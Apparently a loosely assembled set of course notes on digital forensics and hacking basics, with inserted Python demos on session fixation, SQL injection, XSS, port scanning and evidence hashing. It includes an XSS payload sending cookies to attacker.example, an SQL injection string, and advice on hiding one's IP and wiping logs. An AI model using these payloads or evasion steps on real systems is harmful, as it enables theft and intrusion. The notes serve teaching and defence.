Testimony and reporting Once the data analysis is complete, computer forensic engineers can help support the client's court case by preparing customized reports about the data collected and produced, and by providing the data and testimony that support the case.
Examining one data source in detail
In NetApp Insight, click the Admin icon on the toolbar; the Data sources list opens. Any potential problems are marked with an exclamation mark in the list, with the most serious problems at the top.
Examining data Select the data source that is causing concern by clicking its name link.
Examining the data source On the data source summary page, check the information in the sections provided for your data source. Event timeline lists the events tied to the current status shown in the Data sources list; events in this summary are displayed per device, errors are shown in red, and positioning the mouse pointer on a timeline item displays additional information. Devices reported by this data source lists the types of devices, their IP addresses, and links to more detailed information for each device.
After examining the data source The available actions are: edit the data source's configuration to correct the problem; poll again, which forces polling to reveal whether the problem is persistent or intermittent; postpone data source polling for 1, 3, or 5 to stop the warning messages; install a patch on the data source to correct the problem; or prepare an error report for NetApp Customer Support.
Data source
In the collectd data model, a data source is one entry in a data set. For example, the octets data set has two data sources, rx and tx. Each value in a value list corresponds directly to a data source.
Data source information A data source consists of four pieces of information about the corresponding value: its name (for example rx or tx); the type of the data source (COUNTER, GAUGE, DERIVE or ABSOLUTE); the minimum value (NaN means negative infinity, i.e. unbounded); and the maximum value (NaN means positive infinity). Values outside the minimum/maximum range are discarded.
Data source types The four data source types are GAUGE, DERIVE, COUNTER and ABSOLUTE. GAUGE: the value is simply stored as-is. This is the right choice for values which may increase as well as decrease, such as temperatures or the amount of memory used. COUNTER: a monotonically increasing value; the difference from the previous reading, divided by the elapsed time, is stored, and a decrease is interpreted as a counter wrap at 32 or 64 bits. DERIVE: like COUNTER, the rate of change is stored, but the value may legitimately decrease, so no wrap handling is applied. ABSOLUTE: probably the most exotic type, intended for counters which are reset upon reading. In effect the type is very similar to GAUGE, except that the value is an integer and is divided by the time since the last reading. This data source type has been available since collectd version 4.8.
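To make the four data source types concrete, here is an added example (not collectd's own code) that computes the stored value for each type from two successive readings, including the counter-wrap handling that COUNTER needs and DERIVE does not, and the min/max discard rule. The 32- and 64-bit wrap widths, the "octets" data set with rx and tx typed as COUNTER, and the sample readings are assumptions constructed for this example.

```python
"""Rate calculation for the four data source types (added example).

Illustrative reimplementation of the semantics described above; not
collectd's own code. Wrap widths and the sample data set are assumed.
"""
import math

# Assumed wrap widths: a counter that decreased is taken to have wrapped at
# 32 bits if the previous reading fitted in 32 bits, else at 64 bits.
WRAP_32 = 2 ** 32
WRAP_64 = 2 ** 64


def rate(ds_type, prev, cur, dt):
    """Value to store for one data source, given the previous reading `prev`
    (None if there was none), the current reading `cur` and the interval
    `dt` in seconds. NaN stands for "unknown", as in the min/max fields.
    """
    if ds_type == "GAUGE":
        return float(cur)            # stored as-is (temperature, memory used)
    if dt <= 0:
        raise ValueError("interval must be positive")
    if ds_type == "ABSOLUTE":
        return cur / dt              # counter reset on read: reading is the delta
    if prev is None:
        return math.nan              # nothing to derive from yet
    diff = cur - prev
    if ds_type == "COUNTER":
        if diff < 0:                 # monotonic counter went down: it wrapped
            diff += WRAP_32 if prev < WRAP_32 else WRAP_64
        return diff / dt
    if ds_type == "DERIVE":
        return diff / dt             # may decrease; no wrap handling
    raise ValueError(f"unknown data source type {ds_type!r}")


def clamp(value, vmin=math.nan, vmax=math.nan):
    """Apply the min/max fields: NaN means unbounded, and a value outside
    the range is discarded (returned as NaN)."""
    if math.isnan(value):
        return value
    if not math.isnan(vmin) and value < vmin:
        return math.nan
    if not math.isnan(vmax) and value > vmax:
        return math.nan
    return value


# Constructed "octets" data set: two COUNTER data sources, rx and tx.
OCTETS = {"rx": "COUNTER", "tx": "COUNTER"}


def process_value_list(dataset, prev, cur, dt):
    """Map each value in a value list onto its data source and rate it."""
    return {name: rate(ds_type, prev.get(name), cur[name], dt)
            for name, ds_type in dataset.items()}


if __name__ == "__main__":
    # Constructed readings 10 s apart; rx wrapped past 32 bits in between.
    before = {"rx": 4294967290, "tx": 500}
    after = {"rx": 10, "tx": 600}
    print(process_value_list(OCTETS, before, after, 10))
```

Note the difference between COUNTER and DERIVE on the same input: a drop from 100 to 60 is a wrap (a huge positive rate) for COUNTER but a legitimate negative rate for DERIVE, so choosing the wrong type silently corrupts the series.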
Attacker identification (session hijacking)
There are three main methods used to perpetrate a session hijack: session fixation, session side-jacking and cross-site scripting.
Session fixation In session fixation, the attacker sets a user's session ID to one known to the attacker, for example by sending the user an email with a link that contains a particular session ID. The attacker then only has to wait until the user logs in: the known ID becomes an authenticated session. The defence is to refuse session IDs the application did not itself issue and to issue a fresh ID at login.
Session side-jacking In session side-jacking, the attacker uses packet sniffing to read the network traffic between two parties and steal the session cookie. Many web sites use SSL/TLS encryption only for the login page, to prevent attackers from seeing the password, and then send the session cookie in the clear for the rest of the session, which is exactly what side-jacking exploits; the whole session needs TLS, and the cookie should carry the Secure flag.
Cross-site scripting In cross-site scripting, the attacker tricks the user's browser into running attacker-supplied code, which is treated as trustworthy because it appears to come from the server, allowing the attacker to obtain a copy of the cookie or perform other operations as the user. Marking the session cookie HttpOnly keeps it out of reach of script.
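The fixation attack and its fix, as an added example that is not from the original page or from any real web framework: a minimal in-memory session store, a login that keeps whatever session ID the request carried (vulnerable), and one that discards it and issues a fresh ID (hardened). The store, the function names and the attacker-chosen ID are constructed for the example.

```python
"""Session fixation: vulnerable versus hardened login (added example).

Illustrative in-memory session store; not code from any real framework.
"""
import secrets


class SessionStore:
    def __init__(self):
        self.sessions = {}          # session_id -> {"user": str | None}

    def new_session(self):
        """Issue an unguessable server-generated session ID."""
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": None}
        return sid

    def user_for(self, sid):
        session = self.sessions.get(sid)
        return session["user"] if session else None


def login_vulnerable(store, request_sid, username, password_ok):
    """Accepts whatever ID arrived in the cookie, even one the server never
    issued, and keeps it after authentication. An attacker who planted the
    ID (e.g. in a link) now holds an authenticated session."""
    if not password_ok:
        return None
    store.sessions.setdefault(request_sid, {"user": None})["user"] = username
    return request_sid


def login_hardened(store, request_sid, username, password_ok):
    """Drops the pre-login session (issued or not) and rotates to a fresh
    ID on authentication, so a pre-set ID is never upgraded. Real code
    would copy any legitimate pre-login state (a basket, say) across."""
    if not password_ok:
        return None
    store.sessions.pop(request_sid, None)
    sid = store.new_session()
    store.sessions[sid]["user"] = username
    return sid


def fixation_attack(login):
    """Simulate the attack: the attacker fixes an ID, the victim logs in
    carrying it, then the attacker presents that same ID."""
    store = SessionStore()
    attacker_sid = "ATTACKER-CHOSEN-ID"      # constructed; sent in a link
    login(store, attacker_sid, "victim", password_ok=True)
    return store.user_for(attacker_sid)      # who the attacker is now


if __name__ == "__main__":
    print("vulnerable:", fixation_attack(login_vulnerable))   # victim
    print("hardened:  ", fixation_attack(login_hardened))     # None
```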
Email
Electronic mail, most commonly referred to as email or e-mail since about 1993, is a method of exchanging digital messages from an author to one or more recipients.
LAN email systems Early LAN-based email systems included cc:Mail, Lantastic, WordPerfect Office, Microsoft Mail, Banyan VINES and Lotus Notes.
Web usage
Internet users are persons who have used the Internet in the last 12 months from any device, including mobile phones. Penetration is the percentage of a country's population that are Internet users.
Access subscriptions Access is counted in terms of fixed broadband and mobile broadband subscriptions.
Hacking Hacking refers to an array of activities carried out to intrude into someone else's personal information space and use it for malicious or unwanted purposes. More generally, the term refers to activities aimed at exploiting security flaws to obtain critical information or to gain access to secured networks.
History Some milestones in the history of hacking. 1980s: the term "cyberspace" is coined; the 414s, a Milwaukee hacker group, are arrested; two hacker groups are formed; 2600: The Hacker Quarterly begins publication. 1990s: a national crackdown on hackers is initiated; Kevin Mitnick is arrested; Microsoft's NT operating system is pierced. 2000: in one of the biggest denial-of-service attacks to date, hackers launch attacks against eBay, Yahoo!, CNN.com, Amazon and others. 2007: a bank is hit by the "biggest ever" hack: the Swedish bank Nordea records nearly $1 million stolen over three months from 250 customer accounts.
Famous hackers Well-known hackers include Ian Murphy and Robert Morris.
Hacker attitude The world is full of fascinating problems waiting to be solved. Being a hacker is lots of fun, but it is a kind of fun that takes lots of effort, and the effort takes motivation: to be a hacker you have to get a basic thrill from solving problems, sharpening your skills and exercising your intelligence. Nobody should ever have to solve a problem twice. Creative brains are a valuable, limited resource, so it is almost a moral duty to share information, solve problems and then publish the solutions, so that other hackers can solve new problems instead of perpetually readdressing old ones. Boredom and drudgery are evil: hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work. Freedom is good: hackers are naturally anti-authoritarian, because anyone who can give you orders can stop you from solving whatever problem fascinates you.
Hacking skills Programming is the fundamental hacking skill: if you don't know any computer languages, you can't do hacking. The single most important step any newbie can take towards acquiring hacker skills is to get one of the open-source Unixes, such as Linux or one of the BSD Unixes, install it on a personal machine, and learn to use and run it. Learn how to use the World Wide Web and write HTML; to be worthwhile, your page must have content: it must be interesting and/or useful to other hackers.
Hacking precautions (from the attacker's side) When you start hacking, the first thing you need to do is make sure the victim will not find out your real identity, so hide your IP address by masking it or using an anonymous proxy server. This is only effective when the victim has no knowledge of computers and the Internet; organizations like the FBI, the CIA and the like will find you in no time, so beware.
IP Address
Every system connected to a network has an Internet Protocol (IP) address which acts as its identity on that network. An IPv4 address is a 32-bit value written as four 8-bit fields (octets) in dotted-decimal form, for example 203.94.35.12. All data sent or received by a system is addressed from or to that address. Behind NAT, many systems share one public address, so an address identifies an endpoint on the network, not necessarily a single machine or person.
IP address finding A remote IP address can be found by any of the following methods: through instant messaging software, through Internet Relay Chat, through your own website, or through email headers.
IP address finding via a website The web server records the IP address of every visitor in its access log as a matter of course; a small Java applet or JavaScript snippet can also be used to report it.
Countermeasures One should surf the Internet through a proxy server, or use one of the numerous free anonymous surfing proxy services, for example www.anonymizer.com. Note that the proxy operator then sees all of your traffic, so this only moves the trust.
IP address finding via email Hotmail.com, along with numerous other email service providers, adds the IP address of the sender to each outgoing email. A typical excerpt of such a header from an email sent from a Hotmail account begins: Return-Path: [email protected]
The originating address also appears in the Received: headers, which every mail server in the path prepends in turn; only the headers added by servers you trust are reliable, because a sender can forge the earlier ones.
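An added example, not from the original page, that pulls the candidate originating IP address out of a message's Received: and X-Originating-IP headers and shows the 32-bit form of an IPv4 address. The sample message is constructed (it uses documentation addresses from 198.51.100.0/24 and 203.0.113.0/24), and the header layout is typical but hypothetical.

```python
"""Originating IP from email headers, plus the 32-bit view of an IPv4
address (added example). The message below is constructed.
"""
import email
import ipaddress
import re

# Constructed sample. Received: headers read top-down: the topmost was added
# last (by the server nearest us), the bottom-most first (nearest the sender).
SAMPLE_MESSAGE = """\
Return-Path: <sender@example.net>
Received: from mx2.example.org (mx2.example.org [198.51.100.7])
\tby mail.example.com with ESMTP id abc123; Mon, 17 Aug 2015 10:00:05 +0000
Received: from webmail.example.net ([203.0.113.45])
\tby mx2.example.org with HTTP; Mon, 17 Aug 2015 09:59:58 +0000
X-Originating-IP: [203.0.113.45]
From: sender@example.net
To: someone@example.com
Subject: hello

body
"""

BRACKETED_IPV4 = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def _bracketed_ip(value):
    """First syntactically valid [a.b.c.d] in a header value, else None."""
    m = BRACKETED_IPV4.search(value)
    if not m:
        return None
    try:
        return str(ipaddress.IPv4Address(m.group(1)))
    except ipaddress.AddressValueError:   # e.g. [999.1.1.1]
        return None


def received_ips(raw_message):
    """IPs from Received: headers, ordered last hop -> first hop."""
    msg = email.message_from_string(raw_message)
    return [ip for ip in map(_bracketed_ip, msg.get_all("Received", [])) if ip]


def originating_ip(raw_message):
    """Best guess at the sender: the first hop (bottom-most Received:).
    Caveat: anything below the headers added by servers you trust may be
    forged by the sender, so treat this as a lead, not proof."""
    ips = received_ips(raw_message)
    return ips[-1] if ips else None


def x_originating_ip(raw_message):
    """Provider-added X-Originating-IP, as Hotmail used to set it."""
    msg = email.message_from_string(raw_message)
    value = msg.get("X-Originating-IP")
    return _bracketed_ip(value) if value else None


def as_32bit(ip):
    """An IPv4 address is one 32-bit number: return (int, dotted quad)."""
    n = int(ipaddress.IPv4Address(ip))
    octets = [(n >> shift) & 0xFF for shift in (24, 16, 8, 0)]
    return n, ".".join(str(o) for o in octets)


if __name__ == "__main__":
    print(received_ips(SAMPLE_MESSAGE))
    print(originating_ip(SAMPLE_MESSAGE), x_originating_ip(SAMPLE_MESSAGE))
    print(as_32bit("203.94.35.12"))
```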
Dangers & Concerns
Once an attacker knows a system's IP address, the concerns include: DoS attacks; being forcibly disconnected from the Internet; Trojan exploitation; geographical information (the address can be mapped to an approximate location); and file-sharing exploits.
NETWORK HACKING A typical attacker works in the following manner: identify the target system; gather information on the target system; find a possible loophole in the target system; exploit this loophole using exploit code; remove all traces from the log files and escape without a trace. The last step is why investigators rely on logs an intruder on the target cannot alter, such as copies shipped to a separate log server.
Port scanning Port scanning means scanning the target system to obtain a list of open ports (ports listening for connections) and the services running on them. It is normally the first step an attacker undertakes, and it yields the open ports, the services, and the operating system running on the target. It can be performed by several methods; manual port scanning can be done with the familiar 'telnet' program. A port scan is also often the first tell-tale sign that gives an attacker away to the system administrator.
TCP connect scanning The port scanner establishes a full three-way TCP/IP handshake with each port on the remote system. The regular three-way handshake is: Client sends SYN to Host; Host replies SYN/ACK to Client; Client sends ACK to Host. This is the most accurate scanning method and needs no special privileges, but because every probe completes a connection it is also the easiest to detect and log.
Security threats Port scanning is commonly used by attackers to obtain the following information about the target system: the list of open ports; the services running; the exact names and versions of those services or daemons; and the operating system name and version.
Major tools Some of the best and most commonly used port scanners are Nmap, SuperScan and hping. Common features of all of them: they are very easy to use and display detailed results.
Countermeasures It is impossible to stop remote hosts from port scanning you, but scans can be detected and logged. Useful anti-port-scanning software includes Scanlogd (a Unix-based port scan detector and logger), BlackICE (a Windows-based port scan detector and logger), Snort (a packet sniffer and IDS), and Abacus PortSentry (capable of detecting both normal and stealth port scanning attempts). Exposing as few services as possible and firewalling the rest limits what a scan can find in the first place.
ICMP scanning The Internet Control Message Protocol (ICMP) is the protocol used for reporting errors that occur while transferring data packets over networks. Originally designed for network diagnosis, to find out what went wrong in a data communication, it is extremely useful for information gathering and can be used for host detection, operating system information, network topology information and firewall detection.
Host detection techniques The basic ICMP host detection technique is the 'ping' command or utility, which can be used to determine whether a remote host is alive. An attacker can use ping for host detection, or to clog up valuable network resources by sending an endless stream of ICMP Echo Request messages. Many hosts and firewalls now drop Echo Requests, so the absence of a reply does not prove a host is down.
Ping host detection (sample output of a ping command executed on a Windows machine)
Types of attacks There is an endless number of attacks an administrator must protect a system against; the main ones are denial of service (DoS) attacks, threats from sniffing and key logging, Trojan attacks, IP spoofing, and buffer overflows.
DoS attacks DoS attacks are aimed at denying valid, legitimate Internet and network users access to the services offered by the target system. In other words, a DoS attack consumes so much of the target's memory, CPU or bandwidth that it cannot serve legitimate users. There are numerous types of denial of service attacks.
Ping of Death attack The maximum IP packet size allowed by TCP/IP is 65,535 bytes. In the Ping of Death attack, a packet larger than this maximum, delivered as fragments that reassemble into an oversize packet, is sent to the target system; on vulnerable systems the target crashes, reboots or hangs as soon as it reassembles the packet. The attack could be executed with the 'ping' command on affected systems of the time; modern operating systems reject oversize reassembly and are not affected.
Smurf attacks In a Smurf attack, the attacker sends a huge number of ping (ICMP Echo) requests to a network's broadcast address with the source address spoofed to be the target's. Every host on that network replies to the target, amplifying the traffic until the target crashes, restarts or hangs. The countermeasure is for routers not to forward directed broadcasts.
Sniffers Sniffers capture all the data packets being sent across the network in raw form. They are commonly used for traffic monitoring, network troubleshooting and gathering information on an attacker; attackers use them for stealing company secrets and sensitive data. Commonly available sniffers include tcpdump, Ethereal (now Wireshark) and dsniff.
Working Sniffers work with the NIC, placing it in promiscuous mode so that it captures every packet visible to the compromised system rather than only those addressed to it.
Countermeasures Switch to switched networks, where only the packets meant for a particular host reach its NIC (though ARP spoofing can defeat this). Use encryption standards such as SSL/TLS, SSH and IPsec so that captured traffic is unreadable.
Key loggers Key loggers record all keystrokes made on a system and store them in a log file, which can later be emailed automatically to the attacker.
Trojans Trojans act as a RAT (Remote Administration Tool), giving the attacker remote control of and remote access to the victim's system.
Working The server part of the Trojan is installed on the target system through trickery or disguise and listens on a predefined port for connections. The attacker connects to it on that port using the client part of the Trojan; once this is done, the attacker has complete control over the target system.
Detection and countermeasures Port scan your own system regularly (netstat or nmap will do). If you find an unexpected open port on which you do not normally run a service, your system might have a Trojan installed. A Trojan can usually be removed with normal anti-virus software.
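The TCP connect scan described under Port Scanning above, and the "port scan your own system" Trojan check, in one added example that is not from the original page. It starts two throw-away listeners on 127.0.0.1 (one standing in for a known service, one for an unexpected Trojan "server part"), performs a full-connect scan, and reports which open ports are absent from a known-good baseline. Everything is constructed and runs only against the loopback interface; do not point it at hosts you are not authorised to test.

```python
"""TCP connect scan of local ports, compared with a baseline (added example).

Runs entirely against 127.0.0.1 using listeners it starts itself.
"""
import socket
import threading


def start_listener():
    """Throw-away TCP listener on a free loopback port (stands in for a
    service, or for a Trojan server part waiting on its predefined port).
    Returns (listening socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    srv.settimeout(0.5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            except OSError:          # listener closed: stop serving
                return
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def free_port():
    """A port that is currently closed (bound, then released)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def connect_scan(host, ports, timeout=0.3):
    """Full-connect scan: connect() completes SYN, SYN/ACK, ACK for each
    port. Returns the sorted ports that accepted a connection. A closed
    port answers RST (connect_ex != 0); a filtered one just times out."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:      # 0: handshake completed
                open_ports.append(port)
    return sorted(open_ports)


def unexpected_ports(open_ports, baseline):
    """Ports open now that the known-good baseline does not account for."""
    return sorted(set(open_ports) - set(baseline))


def demo():
    """Constructed scenario: one known service, one rogue listener, one
    closed port. Returns (open ports found, unexpected ports, known, rogue)."""
    known, known_port = start_listener()
    rogue, rogue_port = start_listener()
    try:
        targets = [known_port, rogue_port, free_port()]
        found = connect_scan("127.0.0.1", targets)
        suspicious = unexpected_ports(found, baseline=[known_port])
        return found, suspicious, known_port, rogue_port
    finally:
        known.close()
        rogue.close()


if __name__ == "__main__":
    found, suspicious, known_port, rogue_port = demo()
    print(f"open: {found}; not in baseline: {suspicious} (rogue was {rogue_port})")
```

A real baseline is the list of ports you expect to be listening on the box; anything outside it deserves a look at the owning process before deciding it is a Trojan.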
Live example: hacking NetBIOS NetBIOS (Network Basic Input/Output System) was originally developed by IBM as an Application Programming Interface (API) for client software to access LAN resources. In its strictest sense, NetBIOS is an interface specification for accessing networking services.
Internet Application Security
According to the Web Hacking Incident Database (WHID) annual report for 2007, 67% of the attacks recorded in 2007 were "for profit" motivated and targeted web applications. Acunetix, a vendor of web application security solutions, reported that on average 70% of websites are at serious and immediate risk of being hacked. One industry estimate cited is one security vulnerability per 1,500 lines of code.
Attack surface Web applications are reached from mobile and browser applications, their data is shared over the Internet, and they are exposed 24/7.
Hacking methods A typical attacker works in the following manner: identify the target system by gathering information on it; find a possible loophole in the target system; exploit the loophole using exploit code; remove all traces from the log files and escape without a trace.
Fundamental methodology Footprinting; discovery of the web application; profiling; finding the real attack points; exploiting the system; and finding the defence mechanisms and an approach around them.
Footprinting The IP address and port are the starting point for an assessment, but it is a myth that one IP address means one application: an address can be multi-hosted (virtual hosting), so one IP can have several applications to assess, and the task is to find every web application running on the domain.
Footprinting tools and methods Host footprinting and domain footprinting both focus on the web application: the former enumerates what is running on a given host and port, the latter enumerates the hosts and names that belong to a domain.
Web application attributes Attributes worth examining include the query string, JavaScript, cookies, the path to cgi-bin, and others.
Why vulnerable? Poor web application coding; insecure deployment of the web application; insufficient input validation; no web traffic filtering; and web application attributes that are not guarded well, for example the query string.
Classes of attacks Authentication: attacks that target a web site's method of validating the identity of a user, service or application. Authorization: attacks that target a web site's method of determining whether a user, service or application has the necessary permissions to perform a requested action. Client-side attacks: the abuse or exploitation of a web site's users. Command execution: attacks designed to execute remote commands on the web site. Logical attacks: the abuse or exploitation of a web application's logic flow.
Brute force: an automated process of trial and error used to guess a person's username, password, credit-card number or cryptographic key. Cross-site scripting (XSS): an attack technique that forces a web site to echo attacker-supplied executable code, which then loads in a user's browser. SQL injection: an attack technique used to exploit web sites that construct SQL statements from user-supplied input. XPath injection: the same idea applied to web sites that construct XPath queries from user-supplied input.
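The SQL injection and cross-site scripting classes side by side with their fixes, as an added example not taken from the page or from any real application: an in-memory SQLite table with a constructed user, a login that concatenates input into SQL beside the parameterized version, and a comment renderer that echoes input beside one that output-encodes it. The payloads are constructed.

```python
"""SQL injection and XSS: vulnerable code beside its hardened form
(added example). In-memory SQLite, constructed user and payloads.
"""
import html
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'correct horse')")  # constructed
    db.commit()
    return db


def login_vulnerable(db, name, password):
    """Builds the SQL statement from user-supplied input: the classic flaw.
    A password of  ' OR '1'='1  turns the WHERE clause into a tautology."""
    sql = (f"SELECT name FROM users WHERE name = '{name}' "
           f"AND password = '{password}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(db, name, password):
    """Same query with bound parameters: input is data, never SQL text."""
    row = db.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?",
        (name, password),
    ).fetchone()
    return row[0] if row else None


def render_comment_vulnerable(comment):
    """Echoes attacker-supplied text straight into the page (stored XSS)."""
    return f"<p class='comment'>{comment}</p>"


def render_comment_escaped(comment):
    """Output encoding turns markup characters into inert entities."""
    return f"<p class='comment'>{html.escape(comment, quote=True)}</p>"


# Constructed payloads.
SQLI_PAYLOAD = "' OR '1'='1"
XSS_PAYLOAD = ("<script>document.location='http://attacker.example/?c='"
               "+document.cookie</script>")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login with payload:", login_vulnerable(db, "alice", SQLI_PAYLOAD))
    print("parameterized login with payload:", login_parameterized(db, "alice", SQLI_PAYLOAD))
    print(render_comment_vulnerable(XSS_PAYLOAD))
    print(render_comment_escaped(XSS_PAYLOAD))
```

Parameterization fixes the SQL case completely because the database driver never parses the input as part of the statement; for XSS the equivalent is encoding at the point of output for the context (HTML body here), not trying to filter input.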
UNIT - 6 Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
Introduction to Digital Forensics Lab
Digital forensics lab process The process of constructing a new forensic laboratory revolves around four general activities: planning, design, construction and moving in.
Planning Planning is the first stage of the process. Key to the planning stage is a needs assessment / design program.
Design Design is the second stage of the process. It covers site access, emergency and service access, and site lighting, and includes two sub-designs: landscape design and parking design.
Security design A security strategy meeting; escort-only design; door access systems; door status monitoring; closed-circuit television (CCTV) systems; and special security design features.
Electrical systems design checklist An emergency generator and an uninterruptible power supply (UPS).
General laboratory design The checklist below is drawn from the design of a full-service, multi-discipline crime laboratory, so only some of its items apply to a digital forensics lab. General items: bench-top work surfaces, biological hoods, hands-free sinks, evidence drying rooms. Controlled Substance Section: instrumentation room, evidence storage room. Toxicology Section: robotics, radioimmunoassay room. Firearms/Tool Marks Section: comparison microscopy room, test fire range, X-ray diffraction (XRD) room, scanning electron microscope room. Forensic Biology/DNA Section: wet blood preparation room, freezer storage room, refrigerated storage room, reagent preparation room, electrophoresis room, photo room, mitochondrial DNA (mtDNA) room, research and development / methods development room. Latent Prints Section: chemical processing room, evidence storage room. Questioned Documents: main questioned documents laboratory space. Computer evidence: administrative work spaces, the main computer evidence laboratory space, and a dry fire-suppression system, since water would destroy the evidence computers and media.
Building The building itself also needs mechanical rooms, communications rooms, staff-use spaces and other support rooms.
Forensic Computer Examiner
The Certified Forensic Computer Examiner (CFCE) credential was the first certification demonstrating competency in computer forensics on Windows-based computers. CFCE training and certification is conducted by the International Association of Computer Investigative Specialists (IACIS), a non-profit, all-volunteer organization of current and former law enforcement members.
Digital forensic examiner checklist The following questions form a digital forensic examiner checklist. Does each examiner have a minimum of a high school diploma or equivalent education certification? Does each examiner have a minimum of eighty hours of digital forensic training? Is all formal training received from a person approved as an instructor in the discipline being taught? Are training syllabi or certificates of completion maintained on file for each class attended? Does each examiner hold an industry-recognized certification in digital forensics? Has each examiner successfully completed, at a minimum, an annual or semi-annual proficiency exam? Is each examiner knowledgeable in the use of the examination equipment, software, and the procedures used in conducting examinations? The following is a digital forensic technician checklist. Begin tracking the man-hours you put into the media analysis and administrative work. Verify the search authority (consent, warrant or subpoena) for the exact legal level of analysis, and establish what level of analysis is authorized and which files you may examine (e.g. does the warrant cover email, unopened email, etc.). Get a copy of this document and place it in your analysis case file. Pull up the master case documentation file and place it in the analysis case file. Create a modified boot disk for the forensic software (EnCase) and ensure it is of the current version loaded on the forensic machine. Fill out all the necessary forms and place all initial case documentation in this file, so that you can keep track of important details from the start of the forensic exam.
Preparing a case file Ensure you have a search warrant or consent to search when you open a case file, and ask the submitting officer to fill out the "Official Request for Laboratory Examination". The most important part of this form is the list of keywords in the investigation that the officer wants you to search the computer for. As part of preparing the case file, create a report to attach to the Media Analysis Worksheet recording: the current date and time (including the appropriate time zone); significant problems or broken items; lapses in analysis; and any special techniques required or used beyond normal processes (e.g. a password cracker). Then create a keyword list.
Create a list of keywords Create a list of keywords to be searched, or get the list from the officer on the case, and place a copy in your analysis case file.
Create findings and analysis CDs Copy the evidentiary files from your "save" subdirectory on the evidence-processing computer to a CD-ROM. Be certain to include on the CD-ROM the utilities the end user (district attorney, investigator, defense) will need to recreate the original files. Make a spare copy of this evidentiary CD to place in evidence. Include in the final report the EnCase report (keyword listing, logical file listings, search results, and a thorough listing of physical image files, free space, slack space and deleted files, where appropriate).
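Copying files to two discs is only as good as the proof that both copies match the originals. As an added example that is not part of the page's checklist (which does not say how the copies are verified), this builds a SHA-256 manifest of the "save" directory, writes it alongside the files so it travels with each disc, and verifies a copy against it, reporting missing and modified files. The directories and file contents are constructed in a temporary directory.

```python
"""SHA-256 manifest for a findings disc and verification of a copy
(added example). Directories and contents below are constructed.
"""
import hashlib
import os
import shutil
import tempfile
from pathlib import Path

MANIFEST_NAME = "MANIFEST.sha256"


def sha256_file(path, chunk=1 << 20):
    """Streamed hash so large image files do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root):
    """{relative POSIX path: sha256} for every file under root, sorted."""
    root = Path(root)
    return {str(p.relative_to(root)).replace(os.sep, "/"): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def write_manifest(root):
    """Hash everything first, then write the manifest (so it excludes itself)."""
    manifest = build_manifest(root)
    lines = [f"{digest}  {rel}" for rel, digest in manifest.items()]
    (Path(root) / MANIFEST_NAME).write_text("\n".join(lines) + "\n")
    return manifest


def read_manifest(path):
    manifest = {}
    for line in Path(path).read_text().splitlines():
        digest, rel = line.split("  ", 1)
        manifest[rel] = digest
    return manifest


def verify_copy(copy_root, manifest):
    """Compare a copy against the manifest: files absent or with a
    different digest are reported; extra files are ignored here."""
    copy_root = Path(copy_root)
    missing, modified = [], []
    for rel, digest in manifest.items():
        p = copy_root / rel
        if not p.is_file():
            missing.append(rel)
        elif sha256_file(p) != digest:
            modified.append(rel)
    return {"missing": missing, "modified": modified}


def demo():
    """Constructed: a save dir with two files, a faithful copy (disc 1) and
    a damaged copy (disc 2). Returns the two verification results."""
    with tempfile.TemporaryDirectory() as tmp:
        save = Path(tmp) / "save"
        (save / "mail").mkdir(parents=True)
        (save / "mail" / "inbox.pst").write_bytes(b"constructed pst bytes")
        (save / "image001.jpg").write_bytes(b"constructed jpeg bytes")
        write_manifest(save)

        disc1 = Path(tmp) / "disc1"
        shutil.copytree(save, disc1)
        disc2 = Path(tmp) / "disc2"
        shutil.copytree(save, disc2)
        (disc2 / "image001.jpg").write_bytes(b"bit rot")   # corrupted
        (disc2 / "mail" / "inbox.pst").unlink()            # lost in copying

        return (verify_copy(disc1, read_manifest(disc1 / MANIFEST_NAME)),
                verify_copy(disc2, read_manifest(disc2 / MANIFEST_NAME)))


if __name__ == "__main__":
    good, bad = demo()
    print("disc1:", good)
    print("disc2:", bad)
```

Record the manifest's own hash in the case notes as well; the file on the disc proves the disc is self-consistent, the value in the notes proves nobody replaced both.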
Case report writing and documentation The case file should contain: the signed original "Computer Forensic Investigative Analysis Report"; the keyword lists used; and the request for support.
Notes of importance Don't make any assumptions. If you discover an email, don't assume you know the recipient's name from the email address alone: an email addressed to "Matt", whose email address is [email protected], does not necessarily mean that the recipient's name is Matt Smith. Email addresses can be faked easily. Spell check is your friend: don't wait for a supervisor or district attorney to proofread your report; spell check it before it leaves your machine.
Digital Forensic accreditation
The accreditation process focuses on the three essential elements of a digital forensic case: Computer Network Evidence Recovery and Analysis (CNERA), Digital Evidence Analysis, Recovery and Preservation (DEARP), and Interpretation of the information in a forensic context (IEPE). All three areas (including IEPE) will be assessed in specific digital/computer courses, e.g. BSc (Hons) Digital Forensics. Although it is possible to be accredited against only two of the standards, it is generally expected that accreditation will be against all three. This decision will be made by the Co-Chair of Standards (Accreditation) and the assessment team.
ACCREDITATION PROCESS
Making Contact: In the first instance, the university should make contact with the Co-Chair of the Standards Committee (Accreditation) by email to briefly discuss the course.
